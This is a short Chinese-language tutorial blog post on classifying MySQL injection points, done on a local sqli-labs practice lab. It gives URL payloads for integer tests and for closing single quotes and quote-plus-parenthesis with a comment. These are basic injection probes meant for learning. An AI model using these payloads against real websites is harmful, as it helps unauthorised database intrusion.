Mysql注入 -- 注入类型
2021/7/2 19:23:43
本文主要是介绍Mysql注入 -- 注入类型,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!
钱真的很重要,以前总觉得太看重钱的人现实,但没钱,真的寸步难行。。。
---- 网易云热评
一、整数注入
1、访问http://192.168.139.129/sqli/Less-2/?id=1 and 1=1,返回正常
2、访问http://192.168.139.129/sqli/Less-2/?id=2-1,返回正常
3、访问http://192.168.139.129/sqli/Less-2/?id=1 and 1=2,返回不正常
说明该注入点是整数注入
二、字符串注入
1、访问http://192.168.139.129/sqli/Less-1/?id=1 and 1=1,返回正常
2、访问http://192.168.139.129/sqli/Less-1/?id=1 and 1=2,返回正常
说明该注入点是字符串注入
三、单引号闭合
1、输入单引号,返回错误,错误信息为('1'' LIMIT 0,1),1后面多了一个单引号,我们用(--+)屏蔽后面的单引号
http://192.168.139.129/sqli/Less-1/?id=1'
2、访问http://192.168.139.129/sqli/Less-1/?id=1' --+,返回正常
四、单引号+括号闭合
1、输入单引号,返回错误,错误信息为('1'') LIMIT 0,1),1后面多了一个单引号和一般括号,我们用('))把前面的括号闭合,然后再用(--+)屏蔽后面的单引号和括号
http://192.168.139.129/sqli/Less-3/?id=1'
2、访问http://192.168.139.129/sqli/Less-3/?id=1') --+,返回正常
五、其他字符串闭合
1、双引号
2、加多重括号等等。。。
这篇关于Mysql注入 -- 注入类型的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!
- 2024-06-25MySQL报错Duplicate entry '0' for key 'PRIMARY'
- 2024-05-29阿里 Canal 实时同步 MySQL 增量数据至 ClickHouse 数据库
- 2024-05-24在Linux下管理MySQL的大小写敏感性
- 2024-04-26MySQL查出时间比实际晚8小时的解决方案
- 2024-04-01JPA不识别MySQL的枚举类型
- 2024-03-30mysql数据库表卡死解决方法
- 2024-03-15MySQL多数据源笔记5-ShardingJDBC实战
- 2024-03-11natural join mysql
- 2024-03-11关于VS2017,VS2015 中利用 EF使用Mysql 不显示数据源问题解决方案
- 2024-02-26mysql 阿里云xb后缀备份文件恢复-icode9专业技术文章分享